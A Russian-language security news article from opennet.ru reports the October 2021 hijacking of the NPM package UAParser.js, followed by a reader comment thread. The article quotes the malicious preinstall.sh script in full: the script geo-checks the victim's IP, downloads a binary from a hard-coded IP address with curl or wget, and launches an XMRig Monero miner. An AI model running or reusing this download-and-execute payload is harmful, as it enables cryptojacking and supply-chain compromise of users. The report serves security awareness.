В NPM-пакет UAParser.js, насчитывающий 8 млн загрузок в неделю, внедрено вредоносное ПО

23.10.2021 22:38

История с удалением из репозитория NPM трёх вредоносных пакетов, копировавших код библиотеки UAParser.js, получила неожиданное продолжение - неизвестные злоумышленники захватили контроль над учётной записью автора проекта UAParser.js и выпустили обновления, содержащие код для кражи паролей и майнинга криптовалют.

Проблема в том, что библиотека UAParser.js, которая предлагает функции для разбора HTTP-заголовка User-Agent, насчитывает около 8 млн загрузок в неделю и используется в качестве зависимости в более чем 1200 проектах. Заявлено, что UAParser.js применяется в проектах таких компаний, как Microsoft, Amazon, Facebook, Slack, Discord, Mozilla, Apple, ProtonMail, Autodesk, Reddit, Vimeo, Uber, Dell, IBM, Siemens, Oracle, HP и Verizon.

Атака была совершена через взлом учётной записи разработчика проекта, который заподозрил неладное после необычной волны спама, свалившейся в его почтовый ящик. Как именно была взломана учётная запись разработчика, не сообщается. Атакующие сформировали выпуски 0.7.29, 0.8.0 и 1.0.0, внедрив в них вредоносный код. В течение нескольких часов разработчики вернули контроль над проектом и сформировали обновления 0.7.30, 0.8.1 и 1.0.1 c устранением проблемы. Вредоносные версии были опубликованы только в виде пакетов в NPM-репозитории. Git-репозиторий проекта на GitHub не пострадал. Всем пользователям, установившим проблемные версии, при обнаружении в Linux файла jsextension, а в Windows файлов jsextension.exe и create.dll, рекомендуется считать систему скомпрометированной и поменять на ней пароли, ключи и сертификаты безопасности.

Добавленные вредоносные изменения напоминали изменения, ранее предложенные в клонах UAParser.js, которые, судя по всему, были выпущены для тестирования функциональности перед совершением широкомасштабной атаки на основной проект. На систему пользователя с внешнего хоста загружался и запускался исполняемый файл jsextension, который выбирался в зависимости от платформы пользователя и был подготовлен в вариантах для Linux и Windows. Для платформы Windows, помимо программы для майнинга криптовалюты Monero (использовался майнер XMRig), злоумышленниками также было организовано внедрение библиотеки create.dll для перехвата паролей и их отправки на внешний хост.

Для загрузки вредоносных компонентов в файл preinstall.sh NPM-пакета был добавлен код


   IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU\|UA\|BY\|KZ')
   if [ -z "$IP" ]
    then
	var=$(pgrep jsextension)
	if [ -z "$var" ]
		then
		curl http://159.148.186.228/download/jsextension -o jsextension 
		if [ ! -f jsextension ]
			then
			wget http://159.148.186.228/download/jsextension -O jsextension
		fi
		chmod +x jsextension
		./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u 49***xYKH --cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null &
	fi
   fi

Как видно из кода, скрипт вначале проверял IP-адрес в сервисе freegeoip.app и не запускал вредоносное приложение для пользователей из России, Украины, Беларуси и Казахстана.

исправить +20 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/56023-npm

Ключевые слова: npm, hack

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (80)

1.1, Аноним (1), 23:27, 23/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+16 +/–
Никода не было и вот опять ps традиция

2.5, QwertyReg (ok), 23:36, 23/10/2021 Скрыто ботом-модератором [к модератору]	–26 +/–

3.9, Смузи Сопли (?), 23:53, 23/10/2021 Скрыто ботом-модератором [к модератору]	+5 +/–

4.10, data man (ok), 23:56, 23/10/2021 Скрыто ботом-модератором [к модератору]	–2 +/–

5.13, Аноним (1), 00:10, 24/10/2021 Скрыто ботом-модератором [к модератору]	+2 +/–

6.16, QwertyReg (ok), 00:20, 24/10/2021 Скрыто ботом-модератором [к модератору]	+/–

7.19, Аноним (1), 00:26, 24/10/2021 Скрыто ботом-модератором [к модератору]	+/–

6.18, data man (ok), 00:22, 24/10/2021 Скрыто ботом-модератором [к модератору]	–2 +/–

7.21, Аноним (1), 00:29, 24/10/2021 Скрыто ботом-модератором [к модератору]	–2 +/–

8.23, data man (ok), 00:37, 24/10/2021 Скрыто ботом-модератором [к модератору]	+1 +/–

8.25, Аноним (25), 03:02, 24/10/2021 Скрыто ботом-модератором [к модератору]	+/–

9.52, Admino (ok), 13:07, 24/10/2021 Скрыто ботом-модератором [к модератору]	+/–

10.57, Аноним (57), 14:24, 24/10/2021 Скрыто ботом-модератором [к модератору]	+/–

4.44, Анонимъ (?), 11:23, 24/10/2021 Скрыто ботом-модератором [к модератору]	+/–

....ответы скрыты (13)

1.3, пятнадцать (?), 23:29, 23/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+13 +/–
>не запускал вредоносное приложение для пользователей из России, Украины, Беларуси и Казахстана русофобия и дискриминация какая-то. не говоря уже о том, что на rust не написано.

2.15, Аноним (15), 00:20, 24/10/2021 [^] [^^] [^^^] [ответить]	+3 +/–
>не говоря уже о том, что на rust не написано а ты шо, исходники видел?

3.42, Урри (ok), 11:17, 24/10/2021 [^] [^^] [^^^] [ответить]	+/–
упс, спалился.

3.61, Аноним (61), 16:25, 24/10/2021 [^] [^^] [^^^] [ответить]	–3 +/–
А что, проблема посмотреть? https://github.com/faisalman/ua-parser-js

2.50, Жорш (?), 12:51, 24/10/2021 [^] [^^] [^^^] [ответить]	–16 +/–
И при всей этой руссофобии не понятно что там делают хохлы в списке.

3.53, пох. (?), 13:33, 24/10/2021 [^] [^^] [^^^] [ответить]

–5 +/–

Ну они какбе намекают, где произведен троян.

Сколеновстанец никогда в таком порядке, естественно, список не напишет. А про казахстан еще и просто забудет.

4.69, Онаним (?), 20:36, 24/10/2021 [^] [^^] [^^^] [ответить]	+/–
Интересно, только меня смущает \' в grep '' на баше?

5.70, Онаним (?), 20:37, 24/10/2021 [^] [^^] [^^^] [ответить]	+/–
\\|, промахнулся в '' так-то ничего эскейпить не надо

5.78, . (?), 08:25, 25/10/2021 [^] [^^] [^^^] [ответить]	+/–
подумаешь, жабомакака не шмагла в баш.

5.95, . (?), 08:37, 26/10/2021 [^] [^^] [^^^] [ответить]

+1 +/–

> Интересно, только меня смущает \' в grep '' на баше?

ну, кстати, зря ты наехал на товарищкапитана, ничего неправильного - это ж grep, а не egrep.

In basic regular expressions the metacharacters ?, +, {, |, (, and )lose their special meaning; instead use the backslashed versions \?,\+, \{, \|, \(, and \).

6.97, Онаним (?), 09:46, 26/10/2021 [^] [^^] [^^^] [ответить]	+/–
Тогда да, это получается не эскейп баша, а эскейп для грепа, плюсую.

4.91, Celcion (ok), 21:46, 25/10/2021 [^] [^^] [^^^] [ответить]	+4 +/–
> Сколеновстанец никогда в таком порядке, естественно, список не напишет А вас это, чуб из-под будёновки вывалился.

5.99, пох. (?), 16:57, 26/10/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Это пейс, но все равно, спасибо! (Спрятал обратно под буденовку.)

2.90, burjui (ok), 20:53, 25/10/2021 [^] [^^] [^^^] [ответить]	+/–
А ещё оно не написано на множестве других ЯП, потому что это NPM.

1.24, Корец (?), 02:08, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Когда уже эту помойку закроют? Что ни новость - так про уязвимости в пакетах NPM.

2.71, Онаним (?), 20:39, 24/10/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Никогда, макакакаки останутся без лефптада, и это - конец.

1.26, Аноньимъ (ok), 03:45, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
>В NPM-пакет UAParser.js, насчитывающий 8 млн загрузок в неделю, внедрено вредоносное ПО Хорошо, хорошо. Продолжайте в том же духе.

2.37, Онаним (?), 09:51, 24/10/2021 [^] [^^] [^^^] [ответить]	+3 +/–
Junk heap development, как он есть.

1.30, lockywolf (ok), 08:38, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Новое ПО это хорошо.

1.31, Аноним (31), 08:48, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+2 +/–
>grep 'RU\\|UA\\|BY\\|KZ RUSSIAN DID IT!!!!!!!

2.33, пох. (?), 09:21, 24/10/2021 [^] [^^] [^^^] [ответить]

–9 +/–

Просто сколеновстаны не котируются даже у майнеров.

А вот к shithost.lv или как там его - вопросов нету. Как и о том, в курсе ли латвийские товарищмайоры что их страна давным-давно превратилась в хостинговую помойку похлеще румын. Добавлю-ка в блокировки навечно.

1.32, Онаним (?), 08:57, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
Ахах, это прекрасно.

1.34, пох. (?), 09:23, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
--donate-level=1 да он, с-ка, еще и жадный!

2.58, Аноним (58), 15:23, 24/10/2021 [^] [^^] [^^^] [ответить]	+1 +/–
И еще ленивый, потому что можно было перекомпилить с уровнем доната 0%.

1.38, Нанобот (ok), 10:11, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
> ./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u 49***xYKH Я так понимаю, строка после -u - идентификатор пользователя. Интересно, можно ли его использовать, чтобы напакостить автору малвари, чтоб его, например, забанили на пулле?

2.46, Аноним (46), 11:40, 24/10/2021 [^] [^^] [^^^] [ответить]	+/–
У него таких акков - тыщщи!

1.40, Аноним (40), 11:03, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
Нужно принимать решение что если проект набирает например больше 1000 установок то разработчик переводится на двухфакторную аутентификацию принудительно

2.65, Аноним (65), 17:11, 24/10/2021 [^] [^^] [^^^] [ответить]	+2 +/–
Сразу на авторизацию по ДНК, с предварительной пробивкой по CODIS.

3.66, Аноним (40), 17:23, 24/10/2021 [^] [^^] [^^^] [ответить]	+4 +/–
удивляет что такая вещь как 2fa среди itшников в 21 веке до сих пор вызывает прилив иронии.

4.77, Kuromi (ok), 07:15, 25/10/2021 [^] [^^] [^^^] [ответить]	–1 +/–
> удивляет что такая вещь как 2fa среди itшников в 21 веке до > сих пор вызывает прилив иронии. Особенно удивляет когда речь идет о нормальной TOTP, а не какой нибудь самопальщине.

5.79, . (?), 08:28, 25/10/2021 [^] [^^] [^^^] [ответить]	+2 +/–
"нормальной" - это той которой надо клиент от гугля на мабилочке? Закрытый, с некоторых пор? ооок...

6.82, Kuromi (ok), 14:15, 25/10/2021 [^] [^^] [^^^] [ответить]	+1 +/–
> "нормальной" - это той которой надо клиент от гугля на мабилочке? Закрытый, > с некоторых пор? ооок... Ну вот реально надоело отвечать на подобный бред. TOTP - стандарт. Альтернативные гуглу приложения есть, даже под линукс, даже под консоль. freeotp вам мало?

7.92, . (?), 22:02, 25/10/2021 [^] [^^] [^^^] [ответить]

+/–

А чего ж тогда клиент был открытый, а стал закрытый? А, это другое...

> Альтернативные гуглу приложения есть

но нахрен нам не нужны. А генераторные otp, не требующие ненужных мобилочек - почему-то (стараниями гугля) вышли из моды.

С моей точки зрения, если чувак не умеет уберечь обычный пароль - значит просто надо вешать на любые его репо индикатор "это - 'программист', будьте бдительны с его софтом" (без права снятия).
А чем он там дальше авторизуется и что в этот раз прое...т - это уже его трудности.

Послезавтра он прое...т доступ к своему локалхосту, и запушит не свои комиты вместе со своими - потому что т-пой и потому что некогда разбираться, надо комитить. И никакая супер-авторизация тебе не поможет, если ты привык всасывать самые распоследние версии npmского мусора.

8.93, Kuromi (ok), 22:36, 25/10/2021 [^] [^^] [^^^] [ответить]	+/–
Да что в прикопались к Гугль Аутентификатору, реально ну стал закрытый, так так... большой текст свёрнут, показать

9.94, . (?), 22:48, 25/10/2021 [^] [^^] [^^^] [ответить]	+/–
Ну вот главный вопрос - зачем он вдруг стал закрытый Что такое о нем знает гугл... большой текст свёрнут, показать

2.101, Аноним (101), 19:27, 04/11/2021 [^] [^^] [^^^] [ответить]	+/–
Они же орать начнут, что их притесняют и паспортные данные требуют. Посмотри, вон, в соседней новости.

1.41, Аноним (41), 11:07, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
Интересна статистика сколько заражённых версий было скачано. Чтобы примерно понимать сколько людей до сих пор ещё не лочат версии зависимостей.

1.43, Аноним (43), 11:20, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+7 +/–
Страшно представить сколько скомпрометированных популярных пакетов в npm может быть на самом деле. Фактически, используя npm нельзя быть уверенным ни в чем. Стопудово, там дополнителтно найдутся еще и пакеты с закладками от спец. служб.

2.72, Онаним (?), 20:40, 24/10/2021 [^] [^^] [^^^] [ответить]	+/–
Скопроментированных Fixed

1.45, Аноним (46), 11:38, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Ждём подобное в растамановских крейтах :-D

2.48, Аноним (-), 12:15, 24/10/2021 [^] [^^] [^^^] [ответить]

+4 +/–

> Ждём подобное в растамановских крейтах :-D

Криворук и ламеро-петросяноват - это раст все виноват ...

https://www.opennet.me/opennews/art.shtml?num=48948
> В AUR-репозитории Arch Linux найдено вредоносное ПО

https://www.opennet.me/opennews/art.shtml?num=48592
> В Ubuntu Snap Store и Chrome Web Store выявлены вредоносные пакеты

Ждем "Вы ни понимаити! Это другое!"™

3.83, Аноним (83), 14:50, 25/10/2021 [^] [^^] [^^^] [ответить]

+/–

> Ждем "Вы ни понимаити! Это другое!"™

aur И snap - такое же **внище!

И те кто их внедряет - ССЗБ.

Ты покажи в rpm и dpkg.

4.85, Аноним (-), 16:00, 25/10/2021 [^] [^^] [^^^] [ответить]

+/–

>> Ждем "Вы ни понимаити! Это другое!"™
> aur И snap - такое же **внище!
> И те кто их внедряет - ССЗБ.

Не разочаровал. Молодец.
> Ты покажи в rpm и dpkg.

https://www.opennet.me/opennews/art.shtml?num=34320
> Неизвестные перекупили старый домен RPM-репозитория PostgreSQL

https://wiki.ubuntu.com/SecurityTeam/FAQ
> What software is supported by the Ubuntu Security team?
> Ubuntu is currently divided into four components: main, restricted, universe and multiverse. All binary packages in main and restricted are supported by the Ubuntu Security team for the life of an Ubuntu release, while binary packages in universe and multiverse are supported by the Ubuntu community.

https://github.com/MalDev101/DEB-REAPER

5.86, Аноним (83), 17:25, 25/10/2021 Скрыто ботом-модератором [к модератору]	+/–

6.87, Аноним (-), 17:31, 25/10/2021 Скрыто ботом-модератором [к модератору]	+/–

7.88, Аноним (83), 17:38, 25/10/2021 Скрыто ботом-модератором [к модератору]	+/–

8.89, Аноним (-), 18:31, 25/10/2021 Скрыто ботом-модератором [к модератору]	+/–

....ответы скрыты (7)

1.47, Аноним (47), 12:10, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
>ua-parser Дайте угадаю, это очередная безделушка в несколько строк вроде left-pad?

2.51, Жорш (?), 12:54, 24/10/2021 [^] [^^] [^^^] [ответить]	+2 +/–
Вы не поверите!

1.54, john_erohin (?), 13:37, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
ну что, уеб-мастера вебдванольные. хотели занедорого пошпионить за пользователями, отличать ботов от lniks/lynx/elinks ? вот и получили мусорное ведро себе на голову.

1.55, kusb (?), 13:39, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
Почему всегда npm?

2.59, Аноним (1), 15:28, 24/10/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Аудитория с соответствующим уровнем развития

2.63, Аноним (46), 16:47, 24/10/2021 [^] [^^] [^^^] [ответить]	+/–
Ничего, скоро пойдут крейты на расте с троянами... Если на расте вообще что-то можно написать.

1.56, n00by (ok), 14:09, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Троян весит 2.47 MB ссылка https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f взята https://twitter.com/BleepinComputer/status/1451958149360099329 DanaBot – банковский троян с модульной архитектурой, впервые описанный Proofpoint в мае 2018 года после обнаружения в спам-кампаниях в Австралии. Троян написан на Delphi, имеет мультикомпонентную и мультиэтапную архитектуру, большинство функций реализовано как плагины. https://habr.com/ru/company/eset/blog/424401/

1.60, Аноним (60), 15:56, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
> и не запускал вредоносное приложение для пользователей из России, Украины, Беларуси и Казахстана Опять эти русские хакеры!?

1.62, псевдонимус (?), 16:30, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+4 +/–
"во вредоносном ПО обнаружено вредоносное ПО" Скандалы, интриги, расследования!

1.64, Kuromi (ok), 16:48, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Как вариант исключение их списка подверженных майнингу СНГшных стран может быть так же уловкой - все сразу закричат "ААА, RUSSKIES!".

2.68, Аноним (46), 19:03, 24/10/2021 [^] [^^] [^^^] [ответить]	+/–
Очень простое объяснение: нет смысла воровать пароли у снгшных растаманщиков, ничего интересного за их паролям не лежит.

3.84, Аноним (83), 14:53, 25/10/2021 [^] [^^] [^^^] [ответить]	+2 +/–
> Очень простое объяснение: нет смысла воровать пароли у снгшных растаманщиков, ничего интересного за их паролям не лежит. Если утащишь пароль жены товарища маёра, неожиданно могут приехать туристы сбор посмотреть.

1.73, Смузи (?), 22:21, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
В докере нужно было запускать

2.74, Аноним (46), 03:19, 25/10/2021 [^] [^^] [^^^] [ответить]	+/–
ну майнилась бы крипта в докере... что поменялось?

3.75, Смузи (?), 04:48, 25/10/2021 [^] [^^] [^^^] [ответить]	+/–
стилер не запустился бы, всплески аномальной нагрузки grafana спалит

4.80, Онаним (?), 09:27, 25/10/2021 [^] [^^] [^^^] [ответить]	+/–
Это если в неё кто-нибудь смотрит, в последнее время такое ощущение, что ей пользующиеся больше волнуются о красоте отчётика для менеджмента, нежели о данных в таковом.

1.81, Аноним (-), 11:19, 25/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
>скрипт вначале проверял IP-адрес в сервисе freegeoip.app и не запускал вредоносное приложение для пользователей из России, Украины, Беларуси и Казахстана. Понятно, вредоносный скрипт выложил сотрудник местной "гебухи". За одно позаботился чтобы не было затронуты деятельностью скрипта союзники из ОДКБ. Сразу видно, кто чей союзник.

2.96, . (?), 08:42, 26/10/2021 [^] [^^] [^^^] [ответить]

+1 +/–

>>скрипт вначале проверял IP-адрес в сервисе freegeoip.app и не запускал вредоносное приложение для пользователей из России, Украины, Беларуси и Казахстана.
> Понятно, вредоносный скрипт выложил сотрудник местной "гебухи". За одно позаботился чтобы

учитывая что все местные кульхакеры давно работают либо на товарищмайора либо на наркокриминал (то есть опять же на товарищмайора но опосредовано) - оно недалеко от истины.

> не было затронуты деятельностью скрипта союзники из ОДКБ. Сразу видно, кто
> чей союзник.

Ну или чьи пароли лучше не воровать, во избежание неприятных инцидентов, да.

А проклятой гуантанамы этот чувак совершенно не боится, зная что сидеть будет вовсе не там.

1.100, шайтан (?), 20:58, 26/10/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
А разраб патриот,однако

игнорирование участников | лог модерирования

Добавить комментарий

Текст: